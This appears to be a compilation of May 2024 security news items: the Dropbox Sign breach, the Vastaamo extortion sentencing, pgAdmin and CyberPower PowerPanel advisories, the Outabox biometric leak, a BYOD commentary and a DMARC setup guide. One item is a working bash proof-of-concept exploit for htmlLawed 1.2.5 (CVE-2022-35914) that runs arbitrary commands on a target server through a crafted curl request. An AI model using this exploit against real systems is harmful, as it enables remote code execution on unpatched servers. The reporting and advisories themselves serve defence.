After a breach in the Dropbox Sign environment, customer information may have been stolen and API users have restricted functionality

Dropbox is reporting a recent “security incident” in which an attacker gained unauthorized access to the Dropbox Sign (formerly HelloSign) production environment. During this access, the attacker had access to Dropbox Sign customer information.

Dropbox Sign is a platform that allows customers to digitally sign, edit, and track documents. The accessed customer information includes email addresses, usernames, phone numbers, and hashed passwords, in addition to general account settings and certain authentication information such as API keys, OAuth tokens, and multi-factor authentication. The access is limited to Dropbox Sign customers and does not affect users of other Dropbox services because the environments are largely separate.

> “We believe that this incident was isolated to Dropbox Sign infrastructure and did not impact any other Dropbox products.”

Even if you never created a Dropbox Sign account but received or signed a document through Dropbox Sign, your email addresses and names were exposed. In a government (K-8) filing about the incident, Dropbox says it found no evidence of unauthorized access to the contents of customers’ accounts (i.e. their documents or agreements), or their payment information. 

The attacker compromised a back-end service account that acted as an automated system configuration tool for the Dropbox Sign environment. The attacker used the privileges of the service account for the production environment to gain access to the customer database.

To limit the aftermath of the incident, Dropbox’s security team reset users’ passwords, logged users out of any devices they had connected to Dropbox Sign, and is coordinating the rotation of all API keys and OAuth tokens.

For customers with API access to Dropbox Sign, the company said new API keys will need to be generated and warned that certain functionality will be restricted while they deal with the breach.

Dropbox says it has reported this event to data protection regulators and law enforcement.

**Recommendations**

Dropbox expired affected passwords and logged users out of any devices they had connected to Dropbox Sign for further protection. The next time these users log in to their Sign account, they’ll be sent an email to reset the password. Dropbox recommends users do this as soon as possible.

If you’re an API customer, to ensure the security of your account, you’ll need to rotate your API key by generating a new one, configuring it with your application, and deleting your current one. Here is how you can easily create a new key.

API customers should be aware that names and email addresses for those who received or signed a document through Dropbox Sign, even if they never created an account, were exposed. So, this may impact their customers.

Customers who use an authenticator app for multi-factor authentication should reset it. Please delete your existing entry and then reset it. If you use SMS you do not need to take any action.

If you reused your Dropbox Sign password on any other services, we strongly recommend that you change your password on those accounts and use multi-factor authentication when available.

****Protecting yourself from a data breach****

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop, or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

 Dropbox Sign customer data accessed in breach 

Two years after a warrant went out for his arrest, Aleksanteri Kivimäki finally has been found guilty of thousands of counts of aggravated attempted blackmail, among other charges.

Source: Taina Sohlman via Alamy Stock Photo

Aleksanteri Kivimäki, a Finnish national, has been sentenced to six years and three months in prison, after stealing thousands of patient records from a psychotherapy clinic and using them to blackmail their owners.

A judge in the district court of Länsi-Uusimaa, Finland, sentenced Kivimäki, 26, on April 30 after finding him guilty of 9,231 counts of aggravated dissemination of information infringing on individuals' private lives, and 20,745 counts of aggravated attempted blackmail. He also was found guilty on 20 counts of aggravated blackmail.

Kivimäki, known online as "Zeekill," breached Psychotherapy Center Vastaamo Oy's IT system in November of 2018. It was after this that sensitive information of the clinic's patients started to be posted online. Kivimäki would demand a ransom of €200 ($213) in order not to leak targets' data, upping the payment to €500 ($534) if the ransom wasn't paid in 24 hours. 

Kivimäki ultimately caused such a ruckus that Finland's crime figures reportedly rose drastically, to more than double the average rate.

A warrant for Kivimäki went out in October of 2022, and he was arrested last year in France. 

In his trial, the court found he was the partial owner of a data center that housed the server used to commit the crimes he was charged with. The encryption key and IP address he used were also discovered.

The district court stated: "Kivimäki's guilt was also supported by the fact that he had published messages related to the data breach and extortion on the forum Ylilauda under his pseudonym in a purposeful and fixed temporal connection with the extortion actions."

**About the Author(s)**

Hacker Sentenced After Years of Extorting Psychotherapy Patients

pgAdmin <= 8.5 is affected by a multi-factor authentication bypass vulnerability. This vulnerability allows an attacker with knowledge of a legitimate account’s username and password may authenticate to the application and perform sensitive actions within the application, such as managing files and executing SQL queries, regardless of the account’s MFA enrollment status.


**pgAdmin is affected by a multi-factor authentication bypass vulnerability**

High severity GitHub Reviewed Published May 2, 2024 to the GitHub Advisory Database • Updated May 3, 2024

GHSA-2mvc-557g-5638: pgAdmin is affected by a multi-factor authentication bypass vulnerability

Threat actor dropped in to Dropbox Sign production environment and accessed emails, passwords, and other PII, along with APIs, OAuth, and MFA info.

Source: Lina Images via Shutterstock

Online storage service Dropbox is warning customers of a data breach by a threat actor that accessed customer credentials and authentication data of one of its cloud-based services.

The breach occurred when an unauthorized user gained access to the Dropbox Sign (formerly HelloSign) production environment, something administrators became aware of on April 24, according to a blog post published on May 1. Dropbox Sign is an online service for signing and storing contracts, nondisclosure agreements, tax forms, and other documents using legally binding e-signatures.

Specifically, the actor gained access to a Dropbox Sign automated system configuration tool, compromising a service account used to execute apps and run automated services as part of Sign's back end.

"As such, this account had privileges to take a variety of actions within Sign's production environment," the Dropbox Sign team wrote in the blog post. "The threat actor then used this access to the production environment to access our customer database."

**Customer Credentials Exposed**

Data exposed in the breach includes Dropbox Sign customer information such as emails, usernames, phone numbers, and hashed passwords. Moreover, anyone who received or signed a document through Dropbox Sign but never created an account had their email addresses and names exposed in the breach.

The threat actor also accessed data from the service itself, such as Dropbox Sign's API keys, OAuth tokens, and multifactor authentication (MFA) details, according to the post. This is all data used by third-party partners to connect to the service and offer seamless integration from their respective online services, with OAuth in particular being weaponized by threat actors for cross-platform compromise. Thus, users of other services could indirectly be affected by the breach.

Dropbox found no evidence that threat actors accessed any of the contents of customer accounts, such as documents or agreements signed through the service, nor any customer payment information. Moreover, as Dropbox Sign's infrastructure is largely separate from other Dropbox services, the company found that none of its other entities were affected by the breach.

As soon as Dropbox discovered the breach, the company brought on forensic investigators to get to the bottom of it; that investigation is ongoing. Dropbox also is in the process of reaching out to all users impacted by the incident and will provide step-by-step instructions on how to further protect their data.

**Mitigation Steps**

As an initial mitigation of the effects of the breach, Dropbox's security team reset users' passwords, logged users out of any devices they had connected to Dropbox Sign, and is coordinating the rotation of all API keys and OAuth tokens for the service. From a user perspective, all Dropbox Sign users will be asked to reset their passwords the next time they log into the service, the company said.

API customers will need to rotate their API keys by generating a new one; instructions for doing this are online. That key will then have to be configured with their individual application, along with deleting the current API key to protect their accounts, according to Dropbox.

"As an additional precaution, we'll be restricting certain functionality of API keys while we coordinate rotation," according to the post. As a result, only signature requests and signing capabilities will continue to be operational until the API key is rotated; only then will the restrictions be removed and the product continue to function as normal.

For customers who use an authenticator app along with Dropbox Sign for MFA, they should reset it by first deleting their existing entry and only then proceed with the reset, the company said. Those who use SMS for MFA don't need to take action.

Further, if someone reused their Dropbox Sign password on any other services, Dropbox recommends that password be changed and MFA be used whenever available.

Dropbox will continue an "extensive review" of the incident to understand exactly what happened, and to protect its customers against similar threats in the future, the company said, adding its willingness to help any customer who was impacted by the breach.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Dropbox Breach Exposes Customer Credentials, Authentication Data

Outabox, an Australian firm that scanned faces for bars and clubs, suffered a breach that shows the problems with giving companies your biometric data.

Police and federal agencies are responding to a massive breach of personal data linked to a facial recognition scheme that was implemented in bars and clubs across Australia. The incident highlights emerging privacy concerns as AI-powered facial recognition becomes more widely used everywhere from shopping malls to sporting events.

The affected company is Australia-based Outabox, which also has offices in the United States and the Philippines. In response to the Covid-19 pandemic, Outabox debuted a facial recognition kiosk that scans visitors and checks their temperature. The kiosks can also be used to identify problem gamblers who enrolled in a self-exclusion initiative. This week, a website called “Have I Been Outaboxed” emerged, claiming to be set up by former Outabox developers in the Philippines. The website asks visitors to enter their name to check whether their information had been included in a database of Outabox data, which the site alleges had lax internal controls and was shared in an unsecured spreadsheet. It claims to have more than 1 million records.

The incident has rankled privacy experts who have long set off alarm bells over the creep of facial recognition systems in public spaces such as clubs and casinos.

“Sadly, this is a horrible example of what can happen as a result of implementing privacy-invasive facial recognition systems,” Samantha Floreani, head of policy for Australia-based privacy and security nonprofit Digital Rights Watch, tells WIRED. “When privacy advocates warn of the risks associated with surveillance-based systems like this, data breaches are one of them.”

According to the Have I Been Outaboxed website, the data includes “facial recognition biometric, driver licence \[sic\] scan, signature, club membership data, address, birthday, phone number, club visit timestamps, slot machine usage.” It claims Outabox exported the “entire membership data” of IGT, a supplier of gambling machines. IGT vice president of global communications Phil O’Shaughnessy tells WIRED that “the data affected by this incident has not been obtained from IGT,” and that the firm would work with Outabox and law enforcement.

The website’s owners posted a photo, signature, and redacted driver license belonging to one of Outabox’s founders, as well as a redacted screenshot of the alleged internal spreadsheet. WIRED was unable to independently verify the identity of the website’s owners or the authenticity of the data they claimed to have. An email sent to an address on the website was not returned.

"Outabox is aware and responding to a cyber incident potentially involving some personal information,” an Outabox spokesperson tells WIRED. “We have been in communication with a group of our clients to inform them and outline our strategy to respond. Due to the ongoing Australian police investigation, we are not able to provide further information at this time.”

The New South Wales police force confirmed to WIRED that it was investigating a data breach on Wednesday, but a spokesperson declined to share further details. On Thursday, the force announced that it, working alongside federal and state agencies, had arrested an unnamed 46-year-old man in a Sydney suburb. He is expected to be charged with blackmail.

Clubs that used Outabox’s technology posted announcements about the incident and notified clients this week. One person who posted a breach notification from a club they visited recounted their experience with the facial recognition system. “My fondest memory of this system is visiting a club and having it confidently match my face to a member that was clearly 20+ years older than me, and looked nothing like me,” they wrote in a post on X. The club did not respond to a request for comment.

The Have I Been Outaboxed website, which is still online at the time of writing, alleges that Outabox stopped paying its developers in the Philippines. AI companies frequently employ low-cost overseas labor, including in the Philippines, to power their systems. The website encourages anybody whose data is included in the breach to contact venues and ask that they remove Outabox’s system. The site, which was set up last week according to online records, lists 19 venues. WIRED searched the database for prominent Australians including politicians, and it returned redacted results listing their name and the venues they allegedly attended.

“We are aware of a malicious website carrying a number of false statements designed to harm our business and defame our senior staff,” the Outabox spokesperson says. “We believe this is linked and urge people not to repeat false and reputationally damaging misinformation.” Outabox declined to specify which statements are false, citing the police investigation.

It’s unclear how much of the story told on the website is true, or whether the perpetrators even have the claimed biometric data. Australian cybersecurity expert Troy Hunt, founder of the breach notification website Have I Been Pwned, tells WIRED that there is little reason to doubt it at this time.

“I haven’t seen any reason not to take this at face value, which means they have exactly what they say they have,” he says. In posts on X, Hunt speculated that the website’s posting may have been preceded by demands that were not met, and that the perpetrators’ actions now “clearly land” in the realm of criminality.

“Offshoring is a messy discussion between the legalities of data sovereignty, perceived shortcomings of foreign labor, and frankly, a big dose of xenophobia,” Hunt says. “It’s not like Aussie developers doing exactly the same thing would have made this OK.”

Floreani of Digital Rights Watch says that the incident illustrates the “significant negative consequences” that can arise from collecting sensitive biometric data. “We need bold privacy reform and strict limitations on facial recognition technology,” she says. “As always, surveillance isn’t safety.”

The Breach of a Face Recognition Firm Reveals a Hidden Danger of Biometrics

Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.

Ever feel like you need a little distance from the Internet? Come up with a clever cybersecurity-related caption to describe the scene, above, and our favorite will win a $25 Amazon gift card.

Here are four convenient ways to, well, voice your ideas before the May 29, 2024, deadline:

*   Via social media: X, Facebook, and LinkedIn. (If you win, we'll respond to you on the same platform, requesting your email address.)
    

**Last Month's Winner**

Aaron Foechterle, a data security analyst at The Exchange, is our latest recipient of a $25 Amazon gift card. His winning caption for last month's "Defying Gravity" contest is below. And a big thank you to everyone who submitted their ideas.

**About the Author(s)**

John Klossner has been drawing technology cartoons for more than 15 years. His work regularly appears in Computerworld and Federal Computer Week. His illustrations and cartoons have also been published in The New Yorker, Barron's, and The Wall Street Journal.

Name That Edge Toon: Puppet Master

Establishing a robust BYOD security strategy is imperative for organizations aiming to leverage the benefits of a mobile-first workforce while mitigating associated risks.

Nitin Uttreja, Global Director, Cybersecurity Architecture and Engineering, Estee Lauder Companies

May 2, 2024

4 Min Read

Source: Maria Mikhaylichenko via Alamy Stock Photo

COMMENTARY

The landscape of corporate IT is evolving, primarily due to the widespread adoption of software-as-a-service (SaaS), which is blurring the boundaries of traditional network perimeters. This change is promoting the widespread implementation of bring-your-own-device (BYOD) practices, which aligns with the workforce's need for flexible and mobile work options. As a result, personal mobile devices are becoming essential in business operations, allowing employees to integrate their own devices into their daily work activities.

However, the integration of personal devices into corporate systems has introduced significant security issues. IT departments are now faced with the challenge of managing devices they do not control, resulting in limited visibility regarding whether these BYOD devices possess essential security measures such as antivirus software and disk encryption. Without these protections, BYOD devices are open to numerous threats, including malware, which could compromise the devices and the sensitive corporate data they access.

The challenge for cybersecurity lies in reducing risk and nurturing a secure and efficient BYOD ecosystem. The primary solutions to this challenge are mobile device management (MDM) and secure remote access strategies. Let's delve into how these technologies work.

**Primary Solutions to Cybersecurity Challenges  ****1\. Mobile device management**

Mobile device management are software solutions instrumental in securing, managing, and monitoring mobile devices within an organization, offering administrators the ability to dictate security policies, deploy software updates, and maintain compliance across various endpoints. Two strategic approaches under the MDM umbrella include:

**a) Corporate workspace approach**

Through the corporate workspace approach, companies can establish a secure and separate area on an employee's personal device, essentially creating two zones: one for personal use and the other for business purposes, each secured by strict security protocols. Such business zone environments ensure that corporate emails, calendars, and designated apps are accessed within a protected and encrypted space. Security measures, including rigorous password policies and the capability to remotely wipe data, are critical, providing a safeguard in cases of device loss or when an employee leaves the company.

**b) Application containerization**

Application containerization is a strategy that secures corporate apps and data by enclosing them in isolated containers on a user's device, protecting work-related applications from the wider device environment. This approach involves deploying containerized corporate applications that are protected with data encryption and robust authentication protocols, thus securing corporate information, even in the event that the device is compromised.

**2\. Secure remote access solutions**

Secure remote access solutions involve methods that allow employees to connect to and interact with corporate resources through terminal servers, virtual desktops, or streamed applications. This approach keeps sensitive data within the safety of the corporate network. Strengthening these connections with policies that restrict data transfer between the BYOD device and the corporate network, along with implementing multifactor authentication (MFA), can enhance the security of remote access.

**Enhancing BYOD Security**

To further enhance BYOD security, organizations can implement additional controls on personal devices, introducing extra layers of defense. Here are some examples of these controls:

**1. Mandating antivirus protection on BYOD devices**

When utilizing VPNs for secure remote access, organizations can require that BYOD devices have antivirus software installed. The VPN client on the device could be configured to verify the presence of antivirus and that the system is fully patched before allowing a connection to the network.

**2. Network access control**

Network access control (NAC) solutions can be employed by organizations to conduct security checks on BYOD devices as they connect to the corporate network, whether through wired or wireless methods. Comparable to VPN controls, NAC can check for installed antivirus software and up-to-date system patches before permitting network access.

**3. Multifactor authentication**

Multifactor authentication is an essential aspect of a robust BYOD policy. By adding extra verification steps to access corporate resources, such as biometric authentication (like fingerprints or facial recognition) alongside traditional tokens, MFA can enhance security significantly. This method can strengthen defenses against unauthorized access, contributing to a more secure environment for the organization.

**4. Network segmentation**

Companies can implement network segmentation to isolate BYOD devices from critical internal resources, thereby minimizing the potential impact of security breaches.

**Conclusion**

Establishing a robust BYOD security strategy is imperative for organizations aiming to leverage the benefits of a mobile-first workforce while mitigating associated risks. By implementing solutions such as mobile device management and secure remote access, coupled with additional controls like antivirus protection, network access control, multifactor authentication, and network segmentation, companies can create a secure and efficient BYOD ecosystem. These measures can safeguard sensitive corporate data and ensure the integrity of the organization's network infrastructure.

**About the Author(s)**

Global Director, Cybersecurity Architecture and Engineering, Estee Lauder Companies

Nitin Uttreja is an accomplished cybersecurity expert, with more than 15 years of specialized experience in the field.

Currently serving as the Director, Global Cybersecurity, at Estée Lauder, Nitin spearheads the Security Architecture and Engineering team. His responsibilities encompass the critical tasks of evaluating, designing, and deploying cybersecurity solutions. Before this role, Nitin held various pivotal leadership positions, including managing Cybersecurity Incident Response at LA County and overseeing Information Security at Zocdoc.

Safeguarding Your Mobile Workforce

htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.

    #!/bin/bash# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution# Date: 2024-05-02# Exploit Author: Miguel Redondo (aka d4t4s3c)# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed# Software Link: https://github.com/kesar/HTMLawed# Version: <= 1.2.5# Tested on: Linux# Category: Web Application# CVE: CVE-2022-35914while getopts ":u:c:" arg; do  case ${arg} in    u) url=${OPTARG}; let parameter_counter+=1 ;;    c) cmd=${OPTARG}; let parameter_counter+=1 ;;  esacdoneif [ -z "${url}" ] || [ -z "${cmd}" ]; then  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"  exit 1else  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"  echo -e "\n[+] Executing Command: ${cmd}\n"  cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')  echo -e "${cmd_output}\n"  exit 0fi

htmlLawed 1.2.5 Remote Command Execution

DMARC adoption is more important than ever following Google's and Yahoo's latest mandates for large email senders. This Tech Tip outlines what needs to be done to enable DMARC on your domain.

Source: Tapati Runchumrus via Shutterstock

For cybersecurity professionals in email security and anti-phishing, the beginning of 2024 marked the start of an evolution. 

In January, adoption of the email standard for protecting domains from spoofing by fraudsters — Domain-based Messaging Authentication, Reporting and Conformance, or DMARC — became a necessity as companies prepared for the enforcement of mandates by email giants Google and Yahoo. DMARC uses a domain record and other email-focused security technologies to determine whether an email comes from a server authorized to send messages on behalf of a particular organization. 

Yet three months later, DMARC adoption is already starting to taper off, and many companies have completed only the most minimal configuration of their domains, such as setting DMARC to flag issues rather than quarantine or even reject messages. 

Unfortunately, many organizations remain concerned that DMARC is just another security control that, if done wrong, could break critical email services, says Rahul Powar, CEO of Red Sift, a threat intelligence provider.

"Many organizations are rightly concerned that if they go and they do a DMARC policy and it's not correct, that they could block something that's really material to the business, such as a massive marketing campaign, or that the CEO's email won't land in the right inbox," he says. "There's a concern about getting it wrong."

As of the end of April, about 7.9 million domains have some sort of DMARC record (yellow), but only 32% are BIMI ready (green). Source: BIMIRadar.com

However, DMARC — and the underlying technologies of Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) — are not difficult to set up for small or midsize businesses that have simple email infrastructure through a third-party service, such as Google Workspace or Microsoft 365. However, if there are older systems or some segmentation using subdomains, the configuration can get complex — fast, says Gerasim Hovhannisyan, co-founder and CEO at service provider EasyDMARC.

"The problem comes when you have legacy systems and multiple sending sources and infrastructure," he says. "Not only enterprises, but the midmarket can have huge problems during email authentication deployment. It's straightforward or easy to do at first glance, but if you do something wrong, totally valid emails will be rejected."

Here is what to keep in mind when setting up DMARC for your organization.

**1\. SPF Alerts Recipients to Emails From Nonapproved Sources**

The first DNS record that an organization needs to set up is SPF, a string that lists the IP addresses and domain names of the mail servers authorized to send email on behalf of the domain. This record is typically set up through your domain provider or email hosting provider. 

A typical SPF record is a DNS TXT record and looks like:

v=spf1 ip4:192.168.1.1 ip4:192.168.2.1 include:example.com -all

The "v=spf1" designates the string as an SPF record and is required for all SPF records. The "ip4" fields list the IP addresses that are allowed to send email on behalf of the domain and can include network addresses using the slash notation. The "include" tag lists the third-party domains that are authorized to send email for the domain, while the "-all" flag specifies that every other domain is not allowed. Other variants, such as "~all," are possible and specify that mail from other domains are allowed but marked insecure, while "+all" allows any server to send email on behalf of the domain.

While the SPF record is a good first step, spammers could exploit the fact that other organizations using a common third-party server, such as Google's, would be authorized to send email on behalf of every other organization using that server.

**2\. DKIM Uses PKI to Verify Email Messages**

DKIM solves the problem of multiple tenants on the same email server and adds email verification as well. The DKIM selector and key is generated by your email provider and then registered as a TXT record in your DNS service provider. 

A typical DKIM record is a DNS TXT record with a selector — a name — such as "\[third party\].\_domainkey" and a value of:

v=DKIM1; k=rsa; p={public key string}

The "v=DKIM1" designates the TXT string as a DKIM record and is required for all DKIM records. The "k=rsa" designates the type of encryption used for the public-key data, with RSA as the default and other values, such as Edwards-curve Digital Signature Algorithm (EdDSA), allowed as well. The "p=" tag contains the public-key data generated by the email service provider. 

As with any public-key encryption infrastructure, organizations should make sure to regularly rotate the keys for their domain infrastructure, says EasyDMARC's Hovannisyan. 

"We have password management systems or rotating passwords for other \[types of\] keys, but we don't do that with DKIM keys," he says. "This is something that should be in place and each time something can be broken, you need to have alerting."

**3\. DMARC Establishes Policies for Email Recipients**

DMARC uses the already-established controls of SPF and DKIM and specifies an organization's email policy — not for emails coming into the organization, but for emails claiming to be sent on behalf of the organization. Organizations that specify a DMARC record gain two benefits: They can tell a receiving server what to do with an email that fails authentication — such as allow delivery, quarantine the message, or reject it — and they direct the receiving server to generate reports about any messages sent to the domain. 

The result is that an organization using DMARC gains visibility into how its domain name and brand is being used by unauthorized parties. 

A typical DMARC record is a DNS TXT record with a "\_DMARC" and a value that is a string with a number of fields, such as:

v=DMARC1; p=reject; adkim=s; aspf=s; rua=mailto:\[email protected\]

In this example, the "v=DMARC1" is the required identifier, the authentication policies for both SPF and DKIM at set to strict — as designated by the "aspf=s" and "adkim=s" tags — and the DMARC reports are sent to an organization-specific email at a third-party provider. In this case, the policy is set to reject, but companies can start with a policy of "none" to gain access to the reporting and move to a policy of "quarantine."

**4\. Check Your DMARC Reports Regularly and Maintain Records**

Establishing a DMARC policy is fairly simple, but using the added information as part of an email-security and brand-protection program requires an alerting mechanism and regular oversight. Often companies will just insert a valid DMARC record in their DNS with a policy of "none" and then forget about the added threat intelligence, Hovannisyan says.

"One of the biggest mistakes with DMARCs is \[a company saying\] that once it's done, I don't need to do anything more," he says. 

Instead, companies should advance through the different policies, starting with "none" but quickly moving to "quarantine" and then finally "strict."

While DMARC can be easy to manage for small companies, large enterprises will likely want to adopt a service to manage the configuration of its email infrastructure and make use of the added capabilities.

"For a small deployment, where you basically just have a Google or an Office 365 on your domain, it's pretty straightforward," says Red Sift's Powar. "I mean, the spec is quite simple, but as soon as you add a little bit of complexity — once you start including a marketing department, an HR department, or maybe a procurement department — you're going to find a lot of senders suddenly start to appear out of your infrastructure."

**5\. Consider BIMI to Increase Trust**

Finally, companies have a fourth standard that can help add more trust to their email messages. The Brand Indicators for Message Identification, or BIMI, standard allows companies to register their logos for use in email clients, but only after they have adopted the maximum level of strictness for their DMARC policies. 

While almost three-quarters of large organizations (73%) have adopted the most basic version of DMARC, the share of those organizations that would pass the most stringent standards vary significantly by nation: In the US, 77% of companies have a strict policy, while only 40% in Germany and 15% in Japan do, according to data from Red Sift. Of all domains, only 3% are considered ready for BIMI, but 32% of the 7.9 million DMARC-enabled domains have strict enough policies to adopt BIMI, according to the BIMIRadar tracking site.

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Why Haven't You Set Up DMARC Yet?

View CSAF
1. EXECUTIVE SUMMARY
CVSS v3 9.8
ATTENTION: Exploitable remotely/Low attack complexity
Vendor: CyberPower
Equipment: PowerPanel
Vulnerabilities: Use of Hard-coded Password, Relative Path Traversal, Use of Hard-coded Credentials, Active Debug Code, Storing Passwords in a Recoverable Format, Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), Use of Hard-coded Cryptographic Key, Improper Authorization
2. RISK EVALUATION
Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of PowerPanel, a business management software, are affected:
PowerPanel: 4.9.0 and prior
3.2 Vulnerability Overview
3.2.1 USE OF HARD-CODED PASSWORD CWE-259
The application code contains a hard-coded set of authentication credentials. This could result in an attacker bypassing authentication and gaining administrator privileges.
CVE-2024-34025 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.2 USE OF HARD-CODED PASSWORD CWE-259
The application code contains a hard-coded JWT signing key. This could result in an attacker forging JWT tokens to bypass authentication.
CVE-2024-34025 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.3 RELATIVE PATH TRAVERSAL CWE-23
A specially crafted Zip file containing path traversal characters can be imported to the server, which allows file writing to the server outside the intended scope, and could allow an attacker to achieve remote code execution.
CVE-2024-33615 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
3.2.4 USE OF HARD-CODED CREDENTIALS CWE-798
Hard-coded credentials are used by the platform to authenticate to the database, other services, and the cloud. This could result in an attacker gaining access to services with the privileges of a Powerpanel application.
CVE-2024-32053 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.5 ACTIVE DEBUG CODE CWE-489
Hard-coded credentials for the test server can be found in the production code. This might result in an attacker gaining access to the testing or production server.
CVE-2024-32047 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.6 STORING PASSWORDS IN A RECOVERABLE FORMAT CWE-257
The key used to encrypt passwords stored in the database can be found in the application code, allowing the passwords to be recovered.
CVE-2024-32042 has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).
3.2.7 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') CWE-89
An attacker with certain MQTT permissions can create malicious messages to all Power Panel devices. This could result in an attacker injecting SQL syntax, writing arbitrary files to the system, and executing remote code.
CVE-2024-31856 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
3.2.8 USE OF HARD-CODED CRYPTOGRAPHIC KEY CWE-321
The devices Power Panel manages use identical certificates based on a hard-coded cryptographic key. This can allow an attacker to impersonate any client in the system and send malicious data.
CVE-2024-31410 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).
3.2.9 IMPROPER AUTHORIZATION CWE-285
Certain MQTT wildcards are not blocked on the system, which might result in an attacker obtaining data from throughout the system after gaining access to any device.
CVE-2024-31409 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
3.3 BACKGROUND
CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: United States
3.4 RESEARCHER
Amir Preminger and Noam Moshe of Claroty Team82 Research reported these vulnerabilities to CISA.
4. MITIGATIONS
CyberPower has released a new version of PowerPanel that fixes these vulnerabilities:
PowerPanel Business: Update to v4.10.1 or later version
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolating them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
5. UPDATE HISTORY
May 02, 2024: Initial Publication

Tag

#auth